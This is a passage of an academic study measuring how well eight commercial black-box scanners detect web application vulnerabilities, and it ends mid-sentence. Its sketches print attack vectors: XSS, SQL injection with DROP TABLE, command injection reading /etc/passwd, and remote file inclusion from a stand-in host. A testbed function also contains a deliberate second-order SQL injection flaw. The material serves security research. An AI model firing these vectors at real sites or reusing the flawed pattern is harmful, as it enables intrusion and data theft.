State of the Art: Automated Black-Box Web Application Vulnerability Testing
Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford University
Stanford, CA
{jbau, divijg}@stanford.edu, {elie, mitchell}@cs.stanford.edu
Abstract—Black-box web application vulnerability scanners
are automated tools that probe web applications for security
vulnerabilities. In order to assess the current state of the art, we
obtained access to eight leading tools and carried out a study
of: (i) the class of vulnerabilities tested by these scanners, (ii)
their effectiveness against target vulnerabilities, and (iii) the
relevance of the target vulnerabilities to vulnerabilities found
in the wild. To conduct our study we used a custom web
application vulnerable to known and projected vulnerabilities,
and previous versions of widely used web applications containing known vulnerabilities. Our results show the promise
and effectiveness of automated tools, as a group, and also
some limitations. In particular, “stored” forms of Cross Site
Scripting (XSS) and SQL Injection (SQLI) vulnerabilities are
not currently found by many tools. Because our goal is to
assess the potential of future research, not to evaluate specific
vendors, we do not report comparative data or make any
recommendations about purchase of specific tools.
Keywords-Web Application Security; Black Box Testing;
Vulnerability Detection; Security Standards Compliance;
I. INTRODUCTION
Black-box web application vulnerability scanners are automated tools that probe web applications for security vulnerabilities, without access to source code used to build the
applications. While there are intrinsic limitations of black-box tools, in comparison with code walkthrough, automated
source code analysis tools, and procedures carried out by
red teams, automated black-box tools also have advantages.
Black-box scanners mimic external attacks from hackers,
provide cost-effective methods for detecting a range of important vulnerabilities, and may be used to configure and test defenses
such as web application firewalls. Since the usefulness of
black-box web scanners is directly related to their ability
to detect vulnerabilities of interest to web developers, we
undertook a study to determine the effectiveness of leading
tools. Our goal in this paper is to report test results and
identify the strengths of current tools, their limitations, and
strategic directions for future research on web application
scanning methods.
Web application security vulnerabilities such as cross-site
scripting, SQL injection, and cross-site request forgeries are
acknowledged problems with thousands of vulnerabilities
reported each year. These vulnerabilities allow attackers to
perform malevolent actions that range from gaining unauthorized account access [1] to obtaining sensitive data such
as credit card numbers [2]. In the extreme case, these vulnerabilities may reveal the identities of intelligence personnel
[3]. Because of these risks, web application vulnerability
remediation has been integrated into the compliance process of major commercial and governmental standards, e.g.
the Payment Card Industry Data Security Standard (PCI
DSS), Health Insurance Portability and Accountability Act
(HIPAA), and the Sarbanes-Oxley Act. To meet these mandates, vendors offer web application scanners that detect vulnerabilities,
provide remediation advice, and generate compliance reports.
Over the last few years, the web vulnerability scanner market
has become a very active commercial space, with, for example, more than 50 products approved for PCI compliance
[4].
This paper reports a study of current automated black-box web application vulnerability scanners, with the aim of
providing the background needed to evaluate and identify
the potential value of future research in this area. To the
best of our knowledge this paper is the most comprehensive
research on any group of web scanners to date. Because we
were unable to find competitive open-source tools in this
area (see Section VII), we contacted the vendors of eight
well-known commercial vulnerability scanners and tested
their scanners against a common set of sample applications.
The eight scanners are listed in Table I. Our study aims to
answer these three questions:
1) What vulnerabilities are tested by the scanners?
2) How representative are the scanner tests of vulnerability populations in the wild?
3) How effective are the scanners?
Because our goal is to assess the potential impact of
future research, we report aggregate data about all scanners,
and some data indicating the performance of the best-performing scanner on each of several measures. Because
this is not a commercial study or comparative evaluation of
individual scanners, we do not report comparative detection
data or provide recommendations of specific tools. No single
scanner is consistently top-ranked across all vulnerability
categories.
We now outline our study methodology and summarize
our most significant findings. We began by evaluating the
set of vulnerabilities tested by the scanners. Since most
of the scanners provide visibility into the way that target
vulnerability categories are scanned, including details of
the distribution of their test vector sets by vulnerability
classification, we use this and other measures to compare the
scanner target vulnerability distribution with the distribution
of in-the-wild web application vulnerabilities. We mine the
latter from incidence rate data as recorded by VUPEN
security [5], an aggregator and validator of vulnerabilities
reported by various databases such as the National Vulnerability Database (NVD) provided by NIST [6]. Using
database results, we also compare the incidence rates of web
application vulnerabilities as a group against incidence rates
for system vulnerabilities (e.g. buffer overflows) as a group.
In the first phase of our experiments, we evaluate scanner detection performance on established web applications,
using previous versions of Drupal, phpBB, and Wordpress,
released around January 2006, all of which include well-known vulnerabilities. In the second phase of our experiments, we construct a custom testbed application containing
an extensive set of contemporary vulnerabilities in proportion with the vulnerability population in the wild. Our
testbed checks all of the vulnerabilities in the NIST Web
Application Scanner Functional Specification [7] and tests
37 of the 41 scanner vulnerability detection capabilities
in the Web Application Security Consortium [8] evaluation
guide for web application scanners. (See Section VII).
Our testbed application also measures scanner ability to
understand and crawl links written in various encodings and
content technologies.
We use our custom application to measure elapsed scanning time and scanner-generated network traffic and, most
importantly, to test the scanners for vulnerability detection and false positive performance.
Our most significant findings include:
1) The vulnerabilities for which the scanners test most
extensively are, in order, Information Disclosure,
Cross Site Scripting (XSS), SQL Injection, and other
forms of Cross Channel Scripting (XCS). This testing
distribution is roughly consistent with the vulnerability
population in the wild.
2) Although many scanners are effective at following
links whose targets are textually present in served
pages, most are not effective at following links through
active content technologies such as Java applets, SilverLight, and Flash.
3) The scanners as a group are effective at detecting
well-known vulnerabilities. They performed capably
at detecting vulnerabilities already reported to VUPEN
from historical application versions. Also, the scanners
detected basic “reflected” cross-site scripting well,
with an average detection rate of over 60%.
4) The scanners performed particularly poorly at detecting “stored” vulnerabilities. For example, no scanner
detected any of our constructed second-order SQLI
vulnerabilities, and the stored XSS detection rate was
only 15%. Other limitations are discussed further in
this paper.

Table I
STUDIED VULNERABILITY SCANNERS

Company     Product            Version   Scanning Profiles Used
Acunetix    WVS                6.5       Default and Stored XSS
Cenzic      HailStorm Pro      6.0       Best Practices, PCI Infrastructure, and Session
HP          WebInspect         8.0       All Checks
IBM         Rational AppScan   7.9       Complete
McAfee      McAfee SECURE      Web       Hack Simulation and DoS
N-Stalker   QA Edition         7.0.0     Everything
Qualys      QualysGuard PCI    Web       N/A
Rapid7      NeXpose            4.8.0     PCI

Our analysis suggests room for improvement in detecting
vulnerabilities inserted in our testbed, and we propose potential areas of research in Section VIII. However, we have
made no attempt to measure the financial value of these tools
to potential users. Scanners performing as shown may have
significant value to customers, when used systematically as
part of an overall security program. In addition, we did not
quantify the relative importance of detecting specific vulnerabilities. In principle, a scanner with a lower detection rate
may be more useful if the smaller number of vulnerabilities
it detects are individually more important to customers.
Section II of this paper discusses the black box scanners
and their vulnerability test vectors. Section III establishes
the population of reported web vulnerabilities. Section IV
presents scanner results on Wordpress, phpBB, and Drupal
versions released around January 2006. Section V discusses
testbed results by vulnerability category for the aggregated
scanner set and also false positives. Section VI contains
remarks on individual scanner performance
as well as user experience. Section VII discusses related
work, and Section VIII concludes by highlighting research
opportunities resulting from this work.
II. BLACK BOX SCANNERS
We begin by describing the general usage scenario and
software architecture of the black-box web vulnerability
scanners. We then discuss the vulnerability categories which
they aim to detect, including test vector statistics where
available. Table I lists the eight scanners incorporated in
our study, which include products from several of the
most-established security companies in the industry. All the
scanners in the study are approved for PCI Compliance
testing [4]. The prices of the scanners in our study range
from hundreds to tens-of-thousands of dollars. Given such
a wide price range and also variations in usability, potential
customers of the scanners would likely not make a purchase
decision on detection performance alone.
Figure 1. Scanner Test Vector Percentage Distribution (categories: XSS, SQLI, XCS, Session, CSRF, Configuration, Info leaks).
A. Usage Scenario
To begin a scanning session using a typical scanner, the
user must enter the entry URL of the web application as
well as provide a single set of user login credentials for
this application. The user then must specify options for the
scanner’s page crawler, in order to maximize page scanning
coverage. Most scanners tested allow a “crawl-only” mode,
so that the user can verify that the provided login and the
crawler options are working as expected. After setting the
crawler, the user then specifies the scanning profile, or
test vector set, to be used in the vulnerability detection
run, before launching the scan. All scanners can proceed
automatically with the scan after profile selection, and most
include interactive modes where the user may direct the
scanner to scan each page. In our testbed experiments,
we always set the scanner to run, in automated mode,
the most comprehensive set of tests available, to maximize
vulnerability detection capability.
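As an illustration of this workflow, the configuration a user typically supplies before launching a scan resembles the following sketch; the field names are hypothetical and do not correspond to any particular vendor's interface.

```python
# Hypothetical scan configuration illustrating the usage scenario above.
# Field names are illustrative only; each vendor's interface differs.
scan_config = {
    "entry_url": "http://testbed.example.com/index.php",
    "credentials": {"username": "scanuser", "password": "secret"},
    "crawler": {
        "max_depth": 10,           # how far to follow links from the entry page
        "crawl_only": True,        # dry run: verify login and crawler coverage first
        "excluded_paths": ["/phpmyadmin/"],
    },
    "profile": "all_checks",       # most comprehensive test vector set available
    "interactive": False,          # fully automated scan, as used in our experiments
}
```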
B. Software Architecture Descriptions
We ran two of the tested scanners, McAfee and Qualys, as
remote services whereby the user configures the scanner via
a web-interface before launching the scan from a vendor-run server farm. The other six scanners were tested as
software packages running on a local computer, although
the NeXpose scanner runs as a network service accessed by
browser via an IP port (thus naturally supporting multiple
scanner instances run by one interface). All scanners, as
would be expected of black box web-application testers,
generate http requests as test vectors and analyze the http
response sent by the web server for vulnerabilities. All local
scanner engines seem to run in a single process, except for
the Cenzic scanner, which runs a separate browser process
that appears to actually render the http response in order to
find potential vulnerabilities therein.
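As a minimal sketch of this architecture (not any vendor's actual implementation), the core of a black-box test is an HTTP request carrying a test vector and an analysis of the response it provokes; the URL and parameter names below are hypothetical.

```python
import urllib.parse
import urllib.request

# Minimal sketch of the black-box request/response loop: inject a test vector
# into a request parameter, then inspect the HTTP response for evidence of the
# vulnerability. Real scanners add crawling, session handling, and far richer
# response analysis (the Cenzic scanner, for instance, renders the response).
TEST_VECTORS = ["<script>alert(531)</script>", "' OR '1'='1"]   # illustrative only

def probe(base_url, param, vector):
    query = urllib.parse.urlencode({param: vector})
    with urllib.request.urlopen(f"{base_url}?{query}") as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return vector in body    # naive check: the vector is echoed back unescaped

for vector in TEST_VECTORS:
    if probe("http://testbed.example.com/search.php", "q", vector):
        print(f"possible injection point for vector {vector!r}")
```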
Table II
CONSENSUS VULNERABILITY CLASSIFICATION ACROSS SCANNERS

Classification               Example Vulnerability
Cross-Site Scripting (XSS)   Cross-Site Scripting
SQL Injection (SQLI)         SQL Injection
Cross Channel Scripting      Arbitrary File Upload
                             Remote File Inclusion
                             OS Command Injection
                             Code Injection
Session Management           Session Fixation
                             Session Prediction
                             Authentication Bypass
Cross-Site Request Forgery   Cross Site Request Forgery
SSL/Server Configuration     SSL Misconfiguration
                             Insecure HTTP Methods
Information Leakage          Insecure Temp File
                             Path Traversal
                             Source Code Disclosure
                             Error Message Disclosure

C. Vulnerability Categories Targeted by Scanners
As each scanner in our study is qualified for PCI compliance, it is mandated to test for each of the Open
Web Application Security Project (OWASP) Top Ten 2007
[9] vulnerability categories. We also examine the scanning
profile customization features of each scanner for further
insight into their target vulnerability categories. All scanners
except Rapid7 and Qualys allow views of the scanning
profile by target vulnerability category; these categories are often
taken directly from the OWASP Top Ten 2007 and 2010rc1, Web
Application Security Consortium (WASC) Threat Classification version 1 [10], or the Common Weakness Enumeration
(CWE) top 25 [11]. In fact, each of these six allows very
fine-grained test customization, resulting in a set of over
100 different targeted vulnerability categories, too numerous
to list here. However, when related vulnerability categories
were combined into more general classifications, we were
able to find a set of consensus classifications for which all
tools test. Table II presents this list of consensus classifications, along with some example vulnerabilities from each
classification. We have kept Cross-Site Scripting and SQL
Injection as their own vulnerability classifications due to
their preponderant rate of occurrence (supported by “in the
wild” data in the next section) and their targeting by all
scanners. The Cross Channel Scripting classification [12]
includes all vulnerabilities, aside from XSS and SQLI, that
allow a user to inject code “across a channel” onto the web
server, where it then executes on the server or in a client
browser; examples are listed in the table.
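For concreteness, generic probe payloads of the kind that fall under these consensus classifications are sketched below; these are textbook examples, not vectors taken from any of the studied scanners.

```python
# Generic, textbook test vectors for several consensus classifications from
# Table II. Actual scanner vector sets are proprietary and far larger.
EXAMPLE_VECTORS = {
    "XSS":       ["<script>alert(1)</script>",
                  "\"><img src=x onerror=alert(1)>"],
    "SQLI":      ["' OR '1'='1",
                  "1; DROP TABLE users --"],
    "XCS":       ["; cat /etc/passwd",                    # OS command injection
                  "http://evil.example.com/shell.txt?"],  # remote file inclusion
    "Info Leak": ["../../../../etc/passwd",               # path traversal
                  "/.svn/entries"],                       # source code disclosure
}
```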
D. Test Vector Statistics
We were able to obtain detailed enough test profile information for four scanners (McAfee, IBM, HP, and Acunetix)
to evaluate how many test vectors target each vulnerability
classification, a rough measure of how much “attention”
scanner vendors devote to each classification. Figure 1 plots
the percentage of vectors targeting each classification aggregated over the four scanners. The results show that scanners
devote most testing to information leakage vulnerabilities,
followed by XSS and SQLI vulnerabilities.
III. VULNERABILITY POPULATION FROM
VUPEN-VERIFIED NVD
In order to evaluate how well the vulnerability categories
tested by the scanners represent the web application vulnerability population “in the wild”, we took all of the web vulnerability categories forming the consensus classifications
from Table II and performed queries against the VUPEN
Security Vulnerability Notification Service database for the
years 2005 through 2009. We chose this particular database
as our reference as it aggregates vulnerabilities, verifies them
through the generation of successful attack vectors, and
reports them to sources such as the Common Vulnerabilities
and Exposures (CVE) [13] feed of the National Vulnerability
Database.
We collected from the VUPEN database the relative
incidence rate trends of the web application vulnerability
classes, which are plotted in Figure 2. Figure 3 plots
incidences of web application vulnerabilities against incidences of system vulnerabilities, e.g. Buffer Overflow,
Integer Overflow, Format String, Memory Corruption, and
Race Conditions, again collected by us using data from
VUPEN.
Figure 2 demonstrates that Cross-Site Scripting, SQL
Injection, and other forms of Cross-Channel Scripting have
consistently counted as three of the top four reported web
application vulnerability classes, with Information Leak being the other top vulnerability. These are also the top four
vulnerability classes by scanner test vector count. Within
these four, scanner test vectors for Information Leak amount
to twice that of any other vulnerability class, but the Information Leak incidence rates in the wild are generally lower
than those of XSS, SQLI, and XCS. We speculate that perhaps
test vectors for detecting information leakage, which may
be as simple as checking for accessible common default
pathnames, are easier to create than other test types. Overall,
however, it does appear that the testing emphasis for black-box scanners as a group is reasonably proportional to the
verified vulnerability population in the wild.
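The speculation above is easy to make concrete: an information-leakage check can be as simple as requesting a list of well-known default paths and noting which ones the server serves. The sketch below is a generic illustration with a hypothetical path list, not any vendor's vector set.

```python
import urllib.error
import urllib.request

# Illustrative information-leakage probe: request common default pathnames and
# report any that are accessible. The path list is a generic example only.
DEFAULT_PATHS = ["/phpinfo.php", "/.git/config", "/backup.sql",
                 "/admin/", "/server-status"]

def check_info_leak(base_url):
    found = []
    for path in DEFAULT_PATHS:
        try:
            with urllib.request.urlopen(base_url + path) as resp:
                if resp.status == 200:
                    found.append(path)
        except urllib.error.URLError:
            pass    # 404, 403, or connection error: nothing exposed at this path
    return found
```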
We believe that the increase in SSL vulnerabilities shown
in Figure 2 does not indicate a need for increased black-box scanning. A large number of SSL vulnerabilities were
reported in 2009, causing the upward trend in SSL incidences. However, these are actually certificate spoofing
vulnerabilities that allow a certificate issued for one domain
name, usually one containing a null character, to be accepted as valid
for another domain name [14], [15]. As this vulnerability is
caused by mistakes made by the certificate authority and the
client application (usually browser), it cannot be prevented
by the website operator and thus cannot be detected by web
application scanning. In effect, the number of SSL/Server
configuration vulnerabilities that web application scanners
may reasonably aim to detect does not appear to increase
with the increased SSL vulnerability incidence rate.

Table III
PREVIOUSLY-REPORTED VS SCANNER-FOUND VULNERABILITIES FOR
DRUPAL, PHPBB2, AND WORDPRESS

            Drupal 4.7.0    phpBB2 2.0.19   Wordpress 1.5 strayhorn
Category    Known  Found    Known  Found    Known  Found
XSS         6      2        5      2        13     7
SQLI        2      1        1      1        8      4
XCS         4      0        1      0        8      3
Session     5      4        4      4        6      5
CSRF        2      0        1      0        1      1
Info Leak   4      3        1      1        6      4

Finally, Figures 2 and 3 suggest that 2006 was a particularly high-incidence year for web application vulnerabilities,
with incidence actually decreasing in subsequent years. (This
trend is also confirmed by searches in the CVE database.)
While it is impossible to be certain, evidence gathered during
the course of this study, including the effectiveness of the
scanners at detecting basic XSS and SQLI vulnerabilities,
suggests that the decrease may possibly be attributable to
headway made by the security community against these
vulnerabilities. Improved security, however, has been answered in turn by efforts to uncover more novel forms of
the vulnerabilities.
IV. SCANNER RESULTS ON COMMON WEB
APPLICATIONS
Having confirmed that the testing vector distribution of
black-box web vulnerability scanners as a group roughly
correlates with the vulnerability population trends in the
wild, we now examine whether the scanners are actually
successful at finding existent vulnerabilities. We ran all scanners on three popular web applications, Drupal, phpBB2, and
Wordpress, all with known vulnerabilities. We chose to scan
application versions released around January 2006, as this
was prior to the peak in vulnerability reports in 2006. While
these are field applications with some inherent uncertainty as
to their exact vulnerability content, the early release dates
mean these application versions are the most field-tested,
with most vulnerabilities likely to have been recorded by
VUPEN via the NVD.
Table III lists the specific application versions tested as
well as the number of known vulnerabilities, including those
reported by the VUPEN database for each of these versions.
For all applications, we installed only the default modules
and included no add-ons.
Figure 2. Comparison of Web Application Vulnerability Classes in VUPEN Database (vulnerabilities per year, 2005-2009, for XSS, SQLi, XCS, Session, CSRF, SSL, and Information Leak).

Figure 3. Web Application Vulnerabilities versus System Vulnerabilities in VUPEN Database (vulnerabilities per year, 2005-2009).

Table III also shows the number of vulnerabilities found
by any scanner in the group, out of the set of known
vulnerabilities. As the table shows, the scanners as a group did
a generally good job of detecting these previously known
vulnerabilities. They did particularly well in the Information
Disclosure and Session Management classifications, leading
to the hypothesis that effective test vectors are easier to add
for these categories than others. The scanners also did a
reasonable job of detecting XSS and SQLI vulnerabilities,
with about 50% detection rate for both. The low detection
rate in the CSRF classification may possibly be explained
by the small number of CSRF test vectors. Anecdotally,
one scanner vendor confirmed that they do not report CSRF
vulnerabilities due to the difficulty of determining which
forms in the application require protection from CSRF.
V. SCANNER RESULTS ON CUSTOM TESTBED
In addition to testing scanner detection performance on
established web applications, we also evaluated the scanners
in a controlled environment. We developed our own custom
testbed application containing hand-inserted vulnerabilities,
each of which has a proven attack pattern. We verified each
of the vulnerabilities present in this environment, giving us
significantly less uncertainty about vulnerability content than
in the case of field-deployed applications. (The scanners as a
group did not uncover any unintended vulnerabilities in our
web application.) We plan to release this testbed publicly.
For each vulnerability classification, we incorporated both
“textbook” instances and forward-looking instances, such as
XSS with non-standard tags. However, we kept the vulnerability
content of our testbed roughly proportional to the vulnerability
population in the wild.
Our testbed has around 50 unique URLs and around
3000 lines of code, installed on a Linux 2.6.18-128.1.6.el5
server running Apache 2.2.3, MySQL 5.0.45, and PHP 5.1.6.
PhpMyAdmin was also running on our server alongside
the testbed application, solely for administrative purposes;
we thus ignored any scanner results having to do with
phpMyAdmin.
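To illustrate the kind of flaw that was hand-inserted, the sketch below contrasts a reflected sink with a second-order SQL injection pattern. It is written in Python purely for illustration (the actual testbed is a PHP application), and the handler, table, and column names are hypothetical.

```python
import sqlite3

# Illustration only; the real testbed is PHP/MySQL. The two handlers contrast a
# reflected flaw, visible in the immediate response, with a second-order flaw
# that is only triggered by a later request operating on stored data.

def search_page(query):
    # Reflected XSS: user input is echoed into the response without escaping.
    return f"<p>Results for {query}</p>"

def save_profile(db, user_id, nickname):
    # First request: the nickname is stored safely using a bound parameter...
    db.execute("INSERT INTO profiles (user_id, nickname) VALUES (?, ?)",
               (user_id, nickname))

def greeting_page(db, user_id):
    # ...but a later page concatenates the stored value into a new query,
    # creating a second-order SQL injection that no single request/response
    # pair will reveal.
    nickname = db.execute("SELECT nickname FROM profiles WHERE user_id = ?",
                          (user_id,)).fetchone()[0]
    rows = db.execute("SELECT body FROM messages WHERE recipient = '"
                      + nickname + "'").fetchall()
    return "".join(row[0] for row in rows)
```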
Figure 4. Scanner Footprint: (a) Scanner Execution Time in Minutes; (b) Scanner Bytes Sent and Received.

The remainder of this section is devoted to scanner testbed
data. We begin by presenting the performance footprint of
each scanner on our testbed. Following this, we report page
coverage results, designed to test scanner understanding of
various content technologies. We then present vulnerability
detection results, first an overview and subsequently by
vulnerability classification, giving a brief overview of our
testbed design for each classification. Finally, we discuss
false positives, including experimentally designed “traps” for
false positives as well as scanner results.
A. Scanner Time and Network Footprint
Figures 4a and 4b respectively plot the time required to
scan the testbed application and the number of network bytes
sent/received by each scanner, as measured on the web server
by tcpdump. Scanning time ranged from 66 to 473 minutes,
while network traffic ranged from 80 MB to nearly 1 GB.
Perhaps surprisingly, the scanning time and network traffic statistics seem to be relatively independent of each
other, as exemplified by the Rapid7, Qualys, N-Stalker,
and McAfee results. It is interesting that the two remote
services, Qualys and McAfee, generated comparatively low
amounts of network traffic. Finally, we wish to note that
the footprint statistics are not indicative of vulnerability
detection performance.
B. Coverage Results
To experimentally evaluate site coverage, we wrote hyperlinks using the technology in each category shown in
Figure 5 and embedded tracker code in each landing page
to measure whether the link was followed. For Java,
SilverLight, and Flash, the linked applet or movie is a
simple, bare shell containing only the hyperlink. We then
link to the technology page containing the link from the
application home page, which is written in regular PHP.
The link encoding category encompasses links written
in hexadecimal, decimal, octal, and html encodings, with
the landing page file named in regular ASCII. The “POST
link” test involves a link that only shows up when certain
selections are made on a POST form. The other technologies
are self-explanatory. Figure 5 shows the experimental results,
where the measure is percentage of successful links crawled
over total existent links by technology category.
Figure 5 shows that the scanners as a group have fairly
low comprehension of active technologies such as Java
applets, SilverLight, and, surprisingly given its widespread
use, Flash. We speculate that some scanners only perform
textual analysis of http responses in order to collect URLs,
thus allowing them to perform decently on script-based
links, which are represented in text, but not allowing them
to follow links embedded in compiled objects such as Java
applets and Flash movies. This would also explain the better
coverage of SilverLight over Flash and Java, as SilverLight
is delivered in a text-based markup language. We also
see that the scanners could improve their understanding of
various link encodings.
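A plausible, simplified model of the textual URL extraction hypothesized above is sketched below: a crawler that harvests links by pattern-matching the response text will find anchors and script-embedded URLs, but a URL compiled into a binary SWF or applet resource never appears in that text and is silently missed. The regular expressions are illustrative, not taken from any scanner.

```python
import re

# Simplified model of text-only link harvesting. URLs appearing literally in
# HTML or JavaScript are found; a link compiled into a Flash movie or Java
# applet is invisible to this approach.
HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
JS_URL_RE = re.compile(r'["\'](/[\w./?=&%-]+)["\']')

def extract_links(response_text):
    links = set(HREF_RE.findall(response_text))
    links.update(JS_URL_RE.findall(response_text))
    return links

html = ('<a href="/page1.php">catalog</a>'
        '<script>window.location = "/page2.php";</script>'
        '<embed src="menu.swf">')   # any URL inside menu.swf stays invisible
print(extract_links(html))          # typically {'/page1.php', '/page2.php'}
```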
C. Vulnerability Detection Results
1) Overall Results: Figure 6 presents by vulnerability
classification the vulnerability detection rate averaged over
all scanners. The detection rate is simply calculated as the
number of vulnerabilities found over the (known) number of
total vulnerabilities. Results for each vulnerability classification, including an added malware detection classification,
are explained in detail in individual sub-sections to follow.
Each vulnerability classification sub-section describes the
testbed for the category, plots the average detection rate over
all scanners, and also plots anonymous individual scanner
results, sorted from best- to worst-performing for that category.
Figure 5. Successful Link Traversals over Total Links by Technology Category, Averaged Over All Scanners.

Figure 6. Average Scanner Vulnerability Detection Rate By Category.

The results show that the scanners as a group are fairly
effective at detecting basic “reflected” cross-site scripting
(XSS type 1), with a detection rate of over 60%. Also,
although not shown, basic forms of first-order SQL Injection
were detected by a majority of scanners. Unfortunately,
the overall results for the first-order SQL vulnerability
classification were dragged down by poor scanner detection
of more complex forms of first-order SQL injection that use
different keywords. Aside from the XSS type 1 classification,
there were no other vulnerability classifications where the
scanners as a group detected more than 32.5% of the
vulnerabilities. In some cases, scanners were unable to detect
testbed vulnerabilities which were an exact match for a category listed in the scanning profile. We also note how poorly
the scanners performed at detecting “stored” vulnerabilities,
i.e. XSS type 2 and second-order SQL injection, and how
no scanner was able to detect the presence of malware. We
will discuss our thoughts on how to improve detection of
these under-performing categories in Section VIII.
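The gap between reflected and stored detection rates is visible in how much work each check requires of a scanner. The following is a minimal sketch under hypothetical testbed URLs: a reflected check needs only a single request/response pair, whereas a stored check must correlate an injection submitted on one page with output that surfaces later, possibly on a different page entirely.

```python
import urllib.parse
import urllib.request

MARKER = "xss-probe-7f3a"   # unique token so reflections are unambiguous

def fetch(url, data=None):
    body = urllib.parse.urlencode(data).encode() if data else None
    with urllib.request.urlopen(url, data=body) as resp:
        return resp.read().decode("utf-8", errors="replace")

def check_reflected(url, param):
    # Reflected (type 1) XSS: the payload comes straight back in the same response.
    payload = f"<script>{MARKER}</script>"
    page = fetch(f"{url}?{urllib.parse.urlencode({param: payload})}")
    return payload in page

def check_stored(submit_url, field, display_urls):
    # Stored (type 2) XSS: the payload is submitted on one page (e.g. a comment
    # form) and only appears, unescaped, when other pages are re-crawled later.
    payload = f"<script>{MARKER}</script>"
    fetch(submit_url, data={field: payload})
    return any(payload in fetch(u) for u in display_urls)

# Hypothetical testbed endpoints, for illustration only:
# check_reflected("http://testbed.example.com/search.php", "q")
# check_stored("http://testbed.example.com/comment.php", "text",
#              ["http://testbed.example.com/guestbook.php"])
```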
2) Cross-Site Scripting: Due to the preponderance of
Cross-Site Scripting vulnerabilities in the wild, we divided
Cross-Site Scripting into three sub-classes: XSS type 1, XSS
type 2, and XSS advanced. XSS type 1 consists of textbook
examples of reflected XSS, performed via the